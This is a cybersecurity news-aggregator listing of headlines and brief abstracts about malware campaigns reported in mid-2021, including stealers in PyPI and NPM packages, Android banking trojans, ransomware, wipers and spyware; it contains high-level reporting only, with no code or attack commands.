Several Malware Families Targeting IIS Web Servers With Malicious Modules Full Text
Abstract
A systematic analysis of attacks against Microsoft's Internet Information Services (IIS) servers has revealed as many as 14 malware families, 10 of them newly documented, indicating that the Windows-based web server software continues to be a hotbed for natively developed malware for close to eight years. The findings were presented today by ESET malware researcher Zuzana Hromcova at the Black Hat USA security conference . "The various kinds of native IIS malware identified are server-side malware and the two things it can do best is, first, see and intercept all communications to the server, and second, affect how the requests are processed," Hromcova told in an interview with The Hacker News. "Their motivations range from cybercrime to espionage, and a technique called SEO fraud." IIS is an extensible web server software developed by Microsoft, enabling developers to take advantage of its modular architecture and use additional IIS modules to expand onThe Hacker News
August 4, 2021
Python Packages Stealing Discord Tokens and Much More Full Text
Abstract
Eight libraries contained malicious code and were removed by the officials. While two of the eight enabled an attacker to remotely run commands on the target’s device, the other six were stealers.Cyware Alerts - Hacker News
August 3, 2021
New Raccoon Stealer-as-a-Service Aims to Steal Cookies, Cryptocurrencies Full Text
Abstract
In a new campaign tracked by Sophos researchers, the malware was spread not through spam emails but, instead, droppers disguised as installers for cracked and pirated software.ZDNet
August 2, 2021
Six Ways Malicious Linux Shell Scripts Evade Defenses Full Text
Abstract
Cybercriminals are using shell scripts in various sophisticated evasion techniques. Security analysts published a report describing six ways hackers use malicious Linux shell scripts to hide their attacks. They strongly recommend the use of EDR systems for monitoring suspicious events, processes, a ... Read MoreCyware Alerts - Hacker News
August 02, 2021
Solarmarker InfoStealer Malware Once Again Making its Way Into the Wild Full Text
Abstract
Healthcare and education sectors are the frequent targets of a new surge in credential harvesting activity from what's a "highly modular" .NET-based information stealer and keylogger, charting the course for the threat actor's continued evolution while simultaneously remaining under the radar. Dubbed " Solarmarker ," the malware campaign is believed to be active since September 2020, with telemetry data pointing to malicious actions as early as April 2020, according to Cisco Talos. "At its core, the Solarmarker campaign appears to be conducted by a fairly sophisticated actor largely focused on credential and residual information theft," Talos researchers Andrew Windsor and Chris Neal said in a technical write-up published last week. Infections consist of multiple moving parts, chief among them being a .NET assembly module that serves as a system profiler and staging ground on the victim host for command-and-control (C2) communications and furThe Hacker News
July 31, 2021
Android Banking Trojan Vultur uses screen recording for credentials stealing Full Text
Abstract
Experts spotted a new strain of Android banking Trojan dubbed Vultur that uses screen recording and keylogging for the capturing of login credentials. ThreatFabric researchers discovered a new Android banking Trojan, tracked as Vultur, that uses...Security Affairs
July 31, 2021
Microsoft: This Windows and Linux malware does everything it can to stay on your network Full Text
Abstract
Microsoft has continued its analysis of the LemonDuck malware, known for installing crypto-miners in enterprise environments. It makes a strong case for why it is worth removing it from your network.ZDNet
July 30, 2021
LockBit 2.0 Abuses Windows Domains to Propagate Full Text
Abstract
A new LockBit variant has been discovered that comes with automated encryption of a Windows domain. It has multiple advanced features and is now abusing the Active Directory group policies. The new tactics indicate that Lockbit developers are well versed with Windows OS and are leaving no ston ... Read MoreCyware Alerts - Hacker News
July 30, 2021
Experts Uncover Several C&C Servers Linked to WellMess Malware Full Text
Abstract
Cybersecurity researchers on Friday unmasked new command-and-control (C2) infrastructure belonging to the Russian threat actor tracked as APT29, aka Cozy Bear, that has been spotted actively serving WellMess malware as part of an ongoing attack campaign. More than 30 C2 servers operated by the Russian foreign intelligence have been uncovered, Microsoft-owned cybersecurity subsidiary RiskIQ said in a report shared with The Hacker News. APT29, the moniker assigned to government operatives working for Russia's Foreign Intelligence Service (SVR), is believed to have been the mastermind behind the massive SolarWinds supply chain attack that came to light late last year, with the U.K. and U.S. governments formally pinning the intrusions on Russia earlier this April. The activity is being tracked by the cybersecurity community under various codenames, including UNC2452 (FireEye), Nobelium (Microsoft), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), andThe Hacker News
July 30, 2021
PyPI packages caught stealing credit card numbers, Discord tokens Full Text
Abstract
The Python Package Index (PyPI) registry has removed several Python packages this week aimed at stealing users' credit card numbers, Discord tokens, and granting arbitrary code execution capabilities to attackers. These malicious packages were downloaded over 30,000 times according to the researchers who caught them.BleepingComputer
July 30, 2021
Several Malicious Typosquatted Python Libraries Found On PyPI Repository Full Text
Abstract
As many as eight Python packages that were downloaded more than 30,000 times have been removed from the PyPI portal for containing malicious code, once again highlighting how software package repositories are evolving into a popular target for supply chain attacks. "Lack of moderation and automated security controls in public software repositories allow even inexperienced attackers to use them as a platform to spread malware, whether through typosquatting, dependency confusion, or simple social engineering attacks," JFrog researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe said Thursday. PyPI, short for Python Package Index, is the official third-party software repository for Python, with package manager utilities like pip relying on it as the default source for packages and their dependencies. The Python packages in question, which were found to be obfuscated using Base64 encoding, are listed below - pytagora (uploaded by leonora123) pytagora2 (uplThe Hacker News
July 30, 2021
A New Wiper Malware Was Behind Recent Cyberattack On Iranian Train System Full Text
Abstract
A cyber attack that derailed websites of Iran's transport ministry and its national railway system earlier this month, causing widespread disruptions in train services, was the result of a never-before-seen reusable wiper malware called "Meteor." The campaign — dubbed " MeteorExpress " — has not been linked to any previously identified threat group or to additional attacks, making it the first incident involving the deployment of this malware, according to researchers from Iranian antivirus firm Amn Pardaz and SentinelOne. Meteor is believed to have been in the works over the past three years. "Despite a lack of specific indicators of compromise, we were able to recover most of the attack components," SentinelOne's Principal Threat Researcher, Juan Andres Guerrero-Saade, noted. "Behind this outlandish tale of stopped trains and glib trolls, we found the fingerprints of an unfamiliar attacker," adding the offensive is "designed tThe Hacker News
July 30, 2021
Researchers Discover New Solarmarker Malware Activity Focused on Credential and Information Theft Full Text
Abstract
The report by Cisco Talos added that Microsoft researchers believe the Solarmarker campaign is using SEO poisoning in order to make their dropper files highly visible in search engine results.ZDNet
July 29, 2021
Malware Hidden Inside Neural Network Models has Over 90% Efficacy Full Text
Abstract
A new research attack method demonstrated that replacing up to 50% of neurons in the AlextNet model with malware can go undetected under security tools, as the model’s accuracy remained above 93.1%. Popular technologies such as machine learning and neural networks are still at their nascent stage, ... Read MoreCyware Alerts - Hacker News
July 29, 2021
New destructive Meteor wiper malware used in Iranian railway attack Full Text
Abstract
A new file wiping malware called Meteor was discovered used in the recent attacks against Iran's railway system.BleepingComputer
July 29, 2021
Six Malicious Linux Shell Scripts Used to Evade Defenses and How to Stop Them Full Text
Abstract
Uptycs Threat Research outline how malicious Linux shell scripts are used to cloak attacks and how defenders can detect and mitigate against them.Threatpost
July 29, 2021
New Android Malware Uses VNC to Spy and Steal Passwords from Victims Full Text
Abstract
A previously undocumented Android-based remote access trojan (RAT) has been found to use screen recording features to steal sensitive information on the device, including banking credentials, and open the door for on-device fraud. Dubbed "Vultur" due to its use of Virtual Network Computing (VNC)'s remote screen-sharing technology to gain full visibility on targeted users, the mobile malware was distributed via the official Google Play Store and masqueraded as an app named "Protection Guard," attracting over 5,000 installations. Banking and crypto-wallet apps from entities located in Italy, Australia, and Spain were the primary targets. "For the first time we are seeing an Android banking trojan that has screen recording and keylogging as the main strategy to harvest login credentials in an automated and scalable way," researchers from ThreatFabric said in a write-up shared with The Hacker News. "The actors chose to steer away from the commoThe Hacker News
July 29, 2021
New Vultur Android Malware Records Smartphones via VNC to Steal Passwords Full Text
Abstract
Researchers have discovered a new Android malware that uses the VNC technology to record and broadcast a victim’s smartphone activity, allowing attackers to collect keyboard presses and app passwords.The Record
July 28, 2021
UBEL is the New Oscorp — Android Credential Stealing Malware Active in the Wild Full Text
Abstract
An Android malware that was observed abusing accessibility services in the device to hijack user credentials from European banking applications has morphed into an entirely new botnet as part of a renewed campaign that began in May 2021. Italy's CERT-AGID, in late January, disclosed details about Oscorp , a mobile malware developed to attack multiple financial targets with the goal of stealing funds from unsuspecting victims. Its features include the ability to intercept SMS messages and make phone calls and perform Overlay Attacks for more than 150 mobile applications by making use of lookalike login screens to siphon valuable data. The malware was distributed through malicious SMS messages, with the attacks often conducted in real-time by posing as bank operators to dupe targets over the phone and surreptitiously gain access to the infected device via WebRTC protocol and ultimately conduct unauthorized bank transfers. While no new activities were reported since then, it appeThe Hacker News
July 28, 2021
Beware: Fake Windows 11 Installers Spreading Adware Full Text
Abstract
Kaspersky discovered a significant rise in malicious links for bogus Windows 11 installers. The primary purpose of the executable is to download different types of malicious software on the device. Therefore, it is recommended that users avoid downloading installations from third-party websites.Cyware Alerts - Hacker News
July 28, 2021
Increasing Use of ‘Exotic’ Programming Languages for Malware Development Full Text
Abstract
Cybercriminals have been found using new 'exotic' programming languages for carrying out cyber attacks. A recently published report suggests that the use of a few specific languages is becoming a trend to develop new malware. To identify and prevent such threats, security researchers suggest ... Read MoreCyware Alerts - Hacker News
July 28, 2021
BlackMatter ransomware targets companies with revenue of $100 million and more Full Text
Abstract
A new ransomware gang launched into operation this week, claiming to combine the best features of the now-defunct Darkside and REvil ransomware groups, Recorded Future analysts have discovered.The Record
July 27, 2021
Wiper Malware Riding the 2021 Tokyo Olympic Games Full Text
Abstract
In the wee hours of the Tokyo Olympic Games, an interesting Wiper malware surfaced that reminds of the same destructive malware that targeted the Pyeongchang Winter Games. This one is called “Olympic Destroyer.”Fortinet
July 27, 2021
Hackers Turning to ‘Exotic’ Programming Languages for Malware Development Full Text
Abstract
Threat actors are increasingly shifting to "exotic" programming languages such as Go, Rust, Nim, and Dlang that can better circumvent conventional security protections, evade analysis, and hamper reverse engineering efforts. "Malware authors are known for their ability to adapt and modify their skills and behaviors to take advantage of newer technologies," said Eric Milam, Vice President of threat research at BlackBerry. "That tactic has multiple benefits from the development cycle and inherent lack of coverage from protective products." On the one hand, languages like Rust are more secure as they offer guarantees like memory-safe programming , but they can also be a double-edged sword when malware engineers abuse the same features designed to offer increased safeguards to their advantage, thereby making malware less susceptible to exploitation and thwart attempts to activate a kill-switch and render them powerless. Noting that binaries written iThe Hacker News
July 27, 2021
Scammers are using fake Microsoft 11 installers to spread malware Full Text
Abstract
Security firm Kaspersky has warned that crooks were exploiting people overeager to get their hands on the Microsoft operating system update, due for fall release, with fake installers.Cyberscoop
July 26, 2021
Microsoft Warns of LemonDuck Malware Targeting Windows and Linux Systems Full Text
Abstract
An infamous cross-platform crypto-mining malware has continued to refine and improve upon its techniques to strike both Windows and Linux operating systems by setting its sights on older vulnerabilities, while simultaneously latching on to a variety of spreading mechanisms to maximize the effectiveness of its campaigns. "LemonDuck, an actively updated and robust malware that's primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations," Microsoft said in a technical write-up published last week. "Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity." The malware is notorious for its ability to propagate rapidly across an infected network to facilitate information theft anThe Hacker News
July 26, 2021
Hiding Malware inside a model of a neural network Full Text
Abstract
Researchers demonstrated how to hide malware inside an image classifier within a neural network in order to bypass the defense solutions. Researchers Zhi Wang, Chaoge Liu, and Xiang Cui presented a technique to deliver malware through neural network...Security Affairs
July 25, 2021
XCSSET MacOS malware targets Telegram, Google Chrome data and more Full Text
Abstract
XCSSET macOS malware continues to evolve, now it is able to steal login information from multiple apps, including Telegram and Google Chrome. Security researchers from Trend Micro continues to monitor the evolution of the XCSSET macOS malware, new variants...Security Affairs
July 23, 2021
Fake Windows 11 installers now used to infect you with malware Full Text
Abstract
Scammers are already taking advantage of the hype surrounding Microsoft's next Windows release to push fake Windows 11 installers riddled with malware, adware, and other malicious tools.BleepingComputer
July 23, 2021
MacOS malware steals Telegram accounts, Google Chrome data Full Text
Abstract
Security researchers have published details about the method used by a strain of macOS malware to steal login information from multiple apps, enabling its operators to steal accounts.BleepingComputer
July 23, 2021
Nasty macOS Malware XCSSET Now Targets Google Chrome, Telegram Software Full Text
Abstract
A malware known for targeting macOS operating system has been updated once again to add more features to its toolset that allows it to amass and exfiltrate sensitive data stored in a variety of apps, including apps such as Google Chrome and Telegram, as part of further "refinements in its tactics." XCSSET was uncovered in August 2020, when it was found targeting Mac developers using an unusual means of distribution that involved injecting a malicious payload into Xcode IDE projects that's executed at the time of building project files in Xcode. The malware comes with numerous capabilities, such as reading and dumping Safari cookies, injecting malicious JavaScript code into various websites, stealing information from applications, such as Notes, WeChat, Skype, Telegram, and encrypting user files. Earlier this April, XCSSET received an upgrade that enabled the malware authors to target macOS 11 Big Sur as well as Macs running on M1 chipset by circumventing new secuThe Hacker News
July 23, 2021
Researchers Successfully Hide Malware Inside an AI Neural Network Full Text
Abstract
According to the study by Chinese researchers, malware can be embedded directly into the artificial neurons that make up machine learning models in a way that keeps them from being detected.Vice
July 22, 2021
Joker Malware Continues to Go Strong Against Android Users Full Text
Abstract
Zscaler’s ThreatLabZ research team recently observed a new Joker malware variant that was distributed via 11 different apps on Google Play Store.Cyware Alerts - Hacker News
July 21, 2021
CISA warns of hacked Pulse Secure devices loaded with malware in disguise Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an alert today about more than a dozen malware samples found on exploited Pulse Secure devices that are largely undetected by antivirus products.BleepingComputer
July 21, 2021
NPM Package Steals Passwords via Chrome’s Account-Recovery Tool Full Text
Abstract
In another vast software supply-chain attack, the password-stealer is filching credentials from Chrome on Windows systems.Threatpost
July 21, 2021
Malicious NPM Package Caught Stealing Users’ Saved Passwords From Browsers Full Text
Abstract
A software package available from the official NPM repository has been revealed to be actually a front for a tool that's designed to steal saved passwords from the Chrome web browser. The package in question, named " nodejs_net_server " and downloaded over 1,283 times since February 2019, was last updated seven months ago (version 1.1.2), with its corresponding repository leading to non-existent locations hosted on GitHub. "It isn't malicious by itself, but it can be when put into the malicious use context," ReversingLabs researcher Karlo Zanki said in an analysis shared with The Hacker News. "For instance, this package uses it to perform malicious password stealing and credential exfiltration. Even though this off-the-shelf password recovery tool comes with a graphical user interface, malware authors like to use it as it can also be run from the command line." While the first version of the package was published just to test the process ofThe Hacker News
July 21, 2021
NPM package steals Chrome passwords on Windows via recovery tool Full Text
Abstract
New npm malware has been caught stealing credentials from the Google Chrome web browser by using legitimate password recovery tools on Windows systems. Additionally, this malware listens for incoming connections from the attacker's C2 server and provides advanced capabilities, including screen and camera access.BleepingComputer
July 21, 2021
Joker Billing Fraud Malware Apps with 30,000 Downloads Found in Google Play Store Full Text
Abstract
The Joker malware family is a well-known variant that focuses on compromising Android devices. It's designed to spy on its victims, steal information, harvest contact lists, and monitor SMS messaging.ZDNet
July 21, 2021
XLoader malware steals logins from macOS and Windows systems Full Text
Abstract
A highly popular malware for stealing information from Windows systems has been modified into a new strain called XLoader, which can also target macOS systems.BleepingComputer
July 21, 2021
XLoader Windows InfoStealer Malware Now Upgraded to Attack macOS Systems Full Text
Abstract
Cybersecurity researchers on Wednesday disclosed details of an evolving malware that has now been upgraded to steal sensitive information from Apple's macOS operating system. The malware, dubbed "XLoader," is a successor to another well-known Windows-based info stealer called Formbook that's known to vacuum credentials from various web browsers, collect screenshots, log keystrokes, and download and execute files from attacker-controlled domains. "For as low as $49 on the Darknet, hackers can buy licenses for the new malware, enabling capabilities to harvest log-in credentials, collect screenshots, log keystrokes, and execute malicious files," cybersecurity firm Check Point said in a report shared with The Hacker News. Distributed via spoofed emails containing malicious Microsoft Office documents, XLoader is estimated to infected victims spanning across 69 countries between December 1, 2020, and June 1, 2021, with 53% of the infections reported in theThe Hacker News
July 21, 2021
Shlayer Malware: Continued Use of Flash Updates Full Text
Abstract
Recent Shlayer malvertising campaigns have gone back to using fake Flash updates and social engineering tactics to trick victims into manually installing the malware and compromising their systems.Crowdstrike
July 20, 2021
This New Malware Hides Itself Among Windows Defender Exclusions to Evade Detection Full Text
Abstract
Cybersecurity researchers on Tuesday lifted the lid on a previously undocumented malware strain dubbed " MosaicLoader " that singles out individuals searching for cracked software as part of a global campaign. "The attackers behind MosaicLoader created a piece of malware that can deliver any payload on the system, making it potentially profitable as a delivery service," Bitdefender researchers said in a report shared with The Hacker News. "The malware arrives on target systems by posing as cracked installers. It downloads a malware sprayer that obtains a list of URLs from the C2 server and downloads the payloads from the received links." The malware has been so named because of its sophisticated internal structure that's orchestrated to prevent reverse-engineering and evade analysis. Attacks involving MosaicLoader rely on a well-established tactic for malware delivery called search engine optimization (SEO) poisoning, wherein cybercriminals purcThe Hacker News
July 20, 2021
New MosaicLoader malware targets software pirates via online ads Full Text
Abstract
An ongoing worldwide campaign is pushing new malware dubbed MosaicLoader advertising camouflaged as cracked software via search engine results to infect wannabe software pirates' systems.BleepingComputer
July 19, 2021
Israeli Spyware Maker Is in Spotlight Amid Reports of Wide Abuses Full Text
Abstract
Data leaked to a consortium of news organizations suggests that several countries use Pegasus, a powerful cyberespionage tool, to spy on rights activists, dissidents and journalists.New York Times
July 18, 2021
New Leak Reveals Abuse of Pegasus Spyware to Target Journalists Globally Full Text
Abstract
A sweeping probe into a data leak of more than 50,000 phone numbers has revealed an extensive misuse of Israeli company NSO Group's Pegasus "military-grade spyware" to facilitate human rights violations by surveilling heads of state, activists, journalists, and lawyers around the world. Dubbed the " Pegasus Project ," the investigation is a collaboration by more than 80 journalists from a consortium of 17 media organizations in 10 countries coordinated by Forbidden Stories, a Paris-based media non-profit, along with the technical support of Amnesty International. "The Pegasus Project lays bare how NSO's spyware is a weapon of choice for repressive governments seeking to silence journalists, attack activists and crush dissent, placing countless lives in peril," Amnesty International's Secretary-General, Agnès Callamard, said . "These revelations blow apart any claims by NSO that such attacks are rare and down to rogue use of their teThe Hacker News
July 17, 2021
BazarBackdoor Uses New Obfuscation Tricks to Challenge Security Full Text
Abstract
A new phishing campaign is delivering the BazarBackdoor malware and using the multi-compression method to hide the malware as an image file. This method tricks Secure Email Gateways (SEGs) into detecting malicious attachments as clean files. This makes it a worrisome threat and requires continuou ... Read MoreCyware Alerts - Hacker News
July 16, 2021
TeaBot Mobile Banking Malware Targets Users Across Spain, Germany, Switzerland, and the Netherlands Full Text
Abstract
PRODAFT researchers said that the malware, also known as TeaBot/Anatsa, is part of a rising trend of mobile banking trojan attacking users across Spain, Germany, Switzerland, and the Netherlands.ZDNet
July 16, 2021
New enhanced Joker Malware samples appear in the threat landscape Full Text
Abstract
The Joker malware is back, experts spotted multiple malicious apps on the official Google Play store that were able to evade scanners. Experts reported an uptick in malicious Android apps on the official Google Play store laced with the Joker mobile...Security Affairs
July 16, 2021
IoT-Specific Malware Infections Jumped 700% Amid Pandemic Full Text
Abstract
New telemetry from Zscaler on Internet of Things (IoT) devices demonstrates a dramatic increase in attacks on those devices during the work-from-home phase of the COVID-19 pandemic.Dark Reading
July 15, 2021
Microsoft’s print nightmare continues with malicious driver packages Full Text
Abstract
Microsoft's print nightmare continues with another example of how a threat actor can achieve SYSTEM privileges by abusing malicious printer drivers.BleepingComputer
July 15, 2021
SpearTip Finds New Diavol Ransomware Does Steal Data Full Text
Abstract
Security researchers have linked a new ransomware strain called Diavol to the Wizard Spider threat group behind the Trickbot botnet. BleepingComputer noted the ransomware families utilize the same I/O operations for file encryption queueing and use nearly...Security Affairs
July 15, 2021
macOS: Bashed Apples of Shlayer and Bundlore Full Text
Abstract
Uptycs threat research team analyzed macOS malware threat landscape and discovered that Shlayer and Bundlore are the most predominant malware. The Uptycs threat research team has been observing over 90% of macOS malware in our daily analysis and customer...Security Affairs
July 14, 2021
Trickbot Malware Rebounds with Virtual-Desktop Espionage Module Full Text
Abstract
The attackers have spruced up the ‘vncDll’ module used for spying on targets and stealing data.Threatpost
July 14, 2021
Malware-infected Documents Injected for Over Five Months on the Kazakhstan Government’s Portal Full Text
Abstract
T&T Security and Zerde Holding identified at least two documents uploaded on the government’s legal and budget-related sections that were installing a version of the Razy malware on users’ systems.The Record
July 13, 2021
New BIOPASS malware live streams victim’s computer screen Full Text
Abstract
Hackers compromised gambling sites to deliver a new remote access trojan (RAT) called BIOPASS that enables watching the victim's computer screen in real time by abusing popular live-streaming software.BleepingComputer
July 13, 2021
Trickbot Malware Returns with a new VNC Module to Spy on its Victims Full Text
Abstract
Cybersecurity researchers have opened the lid on the continued resurgence of the insidious TrickBot malware , making it clear that the Russia-based transnational cybercrime group is working behind the scenes to revamp its attack infrastructure in response to recent counter efforts from law enforcement. "The new capabilities discovered are used to monitor and gather intelligence on victims, using a custom communication protocol to hide data transmissions between [command-and-control] servers and victims — making attacks difficult to spot," Bitdefender said in a technical write-up published Monday, suggesting an increase in sophistication of the group's tactics. "Trickbot shows no sign of slowing down," the researchers noted. Botnets are formed when hundreds or thousands of hacked devices are enlisted into a network run by criminal operators, which are often then used to launch denial-of-network attacks to pummel businesses and critical infrastructure withThe Hacker News
July 12, 2021
BIOPASS RAT Uses Live Streaming Steal Victims’ Data Full Text
Abstract
The malware has targeted Chinese gambling sites with fake app installers.Threatpost
July 12, 2021
Magecart Now Targeting Magento Credit Card Swipers Full Text
Abstract
Magecart is one of the most active and prominent threat actor groups targeting e-commerce websites. One of the Magecart groups heavily infected Magento e-commerce websites to steal credit card details using six different types of Magento credit card swipers.Cyware Alerts - Hacker News
July 12, 2021
BIOPASS malware abuses OBS Studio to spy on victims Full Text
Abstract
Researchers spotted a new malware, dubbed BIOPASS, that sniffs victim’s screen by abusing the framework of Open Broadcaster Software (OBS) Studio. Researchers from Trend Micro spotted a new malware, dubbed BIOPASS, that sniffs the victim’s...Security Affairs
July 12, 2021
Hackers Spread BIOPASS Malware via Chinese Online Gambling Sites Full Text
Abstract
Cybersecurity researchers are warning about a new malware that's striking online gambling companies in China via a watering hole attack to deploy either Cobalt Strike beacons or a previously undocumented Python-based backdoor called BIOPASS RAT that takes advantage of Open Broadcaster Software (OBS) Studio's live-streaming app to capture the screen of its victims to attackers. The attack involves deceiving gaming website visitors into downloading a malware loader camouflaged as a legitimate installer for popular-but-deprecated apps such as Adobe Flash Player or Microsoft Silverlight, only for the loader to act as a conduit for fetching next-stage payloads. Specifically, the websites' online support chat pages are booby-trapped with malicious JavaScript code, which is used to deliver the malware to the victims. "BIOPASS RAT possesses basic features found in other malware, such as file system assessment, remote desktop access, file exfiltration, and shell command eThe Hacker News
July 12, 2021
BIOPASS RAT New Malware Sniffs Victims via Live Streaming Full Text
Abstract
BIOPASS RAT possesses features such as file system assessment, remote desktop access, file exfiltration, and shell command execution. It can also steal web browser and instant messaging client data.Trend Micro
July 9, 2021
Zloader With a New Infection Technique Full Text
Abstract
The initial attack vector is a phishing email with a Microsoft Word document attachment. Upon opening the document, a password-protected Microsoft Excel file is downloaded from a remote server.McAfee
July 8, 2021
Marvel Movie Malware Detected Full Text
Abstract
Black Widow malware masquerades as new movie to steal money and credentialsInfosecurity Magazine
July 7, 2021
Fake Kaseya VSA Security Update Drops Cobalt Strike Full Text
Abstract
Threat actors are planting Cobalt Strike backdoors by malspamming a bogus Microsoft update along with a SecurityUpdates.exe.Threatpost
July 07, 2021
Fake Kaseya VSA security update backdoors networks with Cobalt Strike Full Text
Abstract
Threat actors are trying to capitalize on the ongoing Kaseya ransomware attack crisis by targeting potential victims in a spam campaign pushing Cobalt Strike payloads disguised as Kaseya VSA security updates.BleepingComputer
July 6, 2021
Malware Dropper: A Threat in Disguise That Cannot be Ignored Full Text
Abstract
Proofpoint researchers dissected a new variant of JSSLoader malware that offered threat actors to evade detections and load additional payloads.Cyware Alerts - Hacker News
July 5, 2021
Mysterious Node.js malware puzzles security researchers Full Text
Abstract
The malware was first spotted in February 2021, being installed as a second-stage payload via GCleaner, a shady software maker that has been seen renting access to users’ devices to malware groups.The Record
July 03, 2021
Android Apps with 5.8 million Installs Caught Stealing Users’ Facebook Passwords Full Text
Abstract
Google intervened to remove nine Android apps downloaded more than 5.8 million times from the company's Play Store after the apps were caught furtively stealing users' Facebook login credentials. "The applications were fully functional, which was supposed to weaken the vigilance of potential victims. With that, to access all of the apps' functions and, allegedly, to disable in-app ads, users were prompted to log into their Facebook accounts," researchers from Dr. Web said . "The advertisements inside some of the apps were indeed present, and this maneuver was intended to further encourage Android device owners to perform the required actions." The offending apps masked their malicious intent by disguising as photo-editing, rubbish cleaner, fitness, and astrology programs, only to trick victims into logging into their Facebook account and hijack the entered credentials via a piece of JavaScript code received from an adversary-controlled server. TheThe Hacker News
July 1, 2021
Linux Variant of REvil Ransomware Targets VMware’s ESXi, NAS Devices Full Text
Abstract
Criminals behind the potent REvil ransomware have ported the malware to Linux for targeted attacks.Threatpost
July 1, 2021
Backdoored Client Discovered from Mongolian CA MonPass Full Text
Abstract
Avast discovered an installer downloaded from the official website of MonPass, a major certification authority (CA) in Mongolia in East Asia that was backdoored with Cobalt Strike binaries.Avast
July 1, 2021
Malware Actors Have Begun Using AutoHotkey Scripts For Attacks Full Text
Abstract
One of the first reported attacks involving AutoHotkey was a credential stealer written in AutoHotkey found in March 2018. It disguised itself as an Antivirus app and spread via infected USB devices.Security Intelligence
June 30, 2021
REvil Linux Variant Now Eying ESXi Virtual Machines Full Text
Abstract
MalwareHunterTeam is alerting about the Linux version of the REvil ransomware that purportedly targets VMware ESXi servers. By targeting virtual machines, REvil can encrypt multiple servers with just a single command. Experts recommend installing VMware (ESXi) in high-security mode and impleme ... Read MoreCyware Alerts - Hacker News
June 30, 2021
PJobRAT Disguised as Android Dating App Steals Contacts, SMS, and GPS Data Full Text
Abstract
The cybersecurity experts at Cyble along with 360 Core Security Lab have recently detected the PJobRAT spyware in dating and instant messaging apps stealing contacts, SMSes, and GPS data.GB Hackers
June 29, 2021
Pirated Games Spreading Cryptojacking Malware Full Text
Abstract
Avast stumbled across the Crackonosh malware operation that helped cybercriminals yield at least $2 million in illegal Monero mining by compromising over 222,000 systems worldwide. Therefore, users are recommended to use genuine software to prevent any cyber-incidents.Cyware Alerts - Hacker News
June 28, 2021
Microsoft Signs Malware That Spreads Through Gaming Full Text
Abstract
The driver, called “Netfilter,” is a rootkit that talks to Chinese C2 IPs and aims to spoof gamers’ geo-locations to cheat the system and play from anywhere, Microsoft said.Threatpost
June 28, 2021
Malware Written in GoLang – A Growing Trend Full Text
Abstract
Several threat actors are increasingly writing malicious codes in GoLang. Recently, the PYSA group was found deploying ChaChi, a remote access trojan written in Go.Cyware Alerts - Hacker News
June 26, 2021
Two New IcedID Campaigns Making Rounds in the Wild Full Text
Abstract
A new variant of the IcedID banking trojan has been discovered that spreads via two new spam campaigns. These campaigns are hitting more than 100 detections a day. The best way to stay protected from such threats is to stay alert while receiving emails from unknown senders.Cyware Alerts - Hacker News
June 26, 2021
Microsoft admits to signing rootkit malware in supply-chain fiasco Full Text
Abstract
Microsoft has now confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control IPs.BleepingComputer
June 26, 2021
Crackonosh malware abuses Windows Safe mode to quietly mine for cryptocurrency Full Text
Abstract
Researchers have discovered a strain of cryptocurrency-mining malware that abuses Windows Safe mode during attacks. The malware, dubbed Crackonosh by researchers at Avast, spreads through pirated and cracked software.ZDNet
June 26, 2021
DarkSide Created a Linux Version of Its Ransomware Full Text
Abstract
The DarkSide Russian-speaking cybercrime group, which announced it was closing its ransomware-as-a-service operation, had earlier completed a Linux version of its malware designed to target ESXi servers hosting VMware virtual machines.Info Risk Today
June 25, 2021
JSSLoader: Recoded and Reloaded | Proofpoint US Full Text
Abstract
After a months-long absence, the malware loader JSSLoader returned in June 2021 cyberattack campaigns by TA543 threat actor, rewritten from the .NET programming language to C++.Proofpoint
June 25, 2021
Crackonosh virus mined $2 million of Monero from 222,000 hacked computers Full Text
Abstract
A previously undocumented Windows malware has infected over 222,000 systems worldwide since at least June 2018, yielding its developer no less than 9,000 Moneros ($2 million) in illegal profits. Dubbed " Crackonosh ," the malware is distributed via illegal, cracked copies of popular software, only to disable antivirus programs installed in the machine and install a coin miner package called XMRig for stealthily exploiting the infected host's resources to mine Monero. At least 30 different versions of the malware executable have been discovered between Jan. 1, 2018, and Nov. 23, 2020, Czech cybersecurity software company Avast said on Thursday, with a majority of the victims located in the U.S., Brazil, India, Poland, and the Philippines. Crackonosh works by replacing critical Windows system files such as serviceinstaller.msi and maintenance.vbs to cover its tracks and abuses the safe mode , which prevents antivirus software from working, to delete Windows DefenderThe Hacker News
June 24, 2021
Spam Downpour Drips New IcedID Banking Trojan Variant Full Text
Abstract
The primarily IcedID-flavored banking trojan spam campaigns were coming in at a fever pitch: Spikes hit more than 100 detections a day.Threatpost
June 24, 2021
Malicious spam campaigns delivering banking Trojans Full Text
Abstract
In mid-March 2021, Kaspersky researchers observed two new spam campaigns. The messages in both cases were written in English and contained ZIP attachments or links to ZIP files.Kaspersky Labs
June 24, 2021
New GoLang-based ChaChi Trojan Used as Part of Ransomware Campaigns Against US Schools Full Text
Abstract
The research team from BlackBerry Threat Research and Intelligence said on Wednesday that the malware, dubbed ChaChi, is also being used as a key component in launching ransomware attacks.ZDNet
June 24, 2021
ChaChi, a GoLang Trojan used in ransomware attacks on US schools Full Text
Abstract
A new Trojan written in the Go programming language, tracked as ChaChi, was involved in ransomware attacks against government agencies and US schools. Researchers from BlackBerry Threat Research and Intelligence spotted a new RAT written in the Go programming...Security Affairs
June 24, 2021
Ursnif Leverages Cerberus Android Malware to Automate Fraudulent Bank Transfers in Italy Full Text
Abstract
Once infected by Ursnif and upon attempting to access their banking account, victims are advised that they won’t be able to continue to use their bank’s services without downloading a security app.Security Intelligence
June 23, 2021
sLoad Malware Moving to European Targets Full Text
Abstract
Starslord loader has been reported active again with its target in the U.K and Italy. The malware creator is regularly changing the first stage script, while the main module largely remains the same. sLoad is a potential threat; it is important that organizations take this threat more seriously and ... Read MoreCyware Alerts - Hacker News
June 23, 2021
PYSA ransomware backdoors education orgs using ChaChi malware Full Text
Abstract
The PYSA ransomware gang has been using a remote access Trojan (RAT) dubbed ChaChi to backdoor the systems of healthcare and education organizations and steal data that later gets leveraged in double extortion ransom schemes.BleepingComputer
June 22, 2021
Vigilante Malware Prevent Access to Piracy Sites Full Text
Abstract
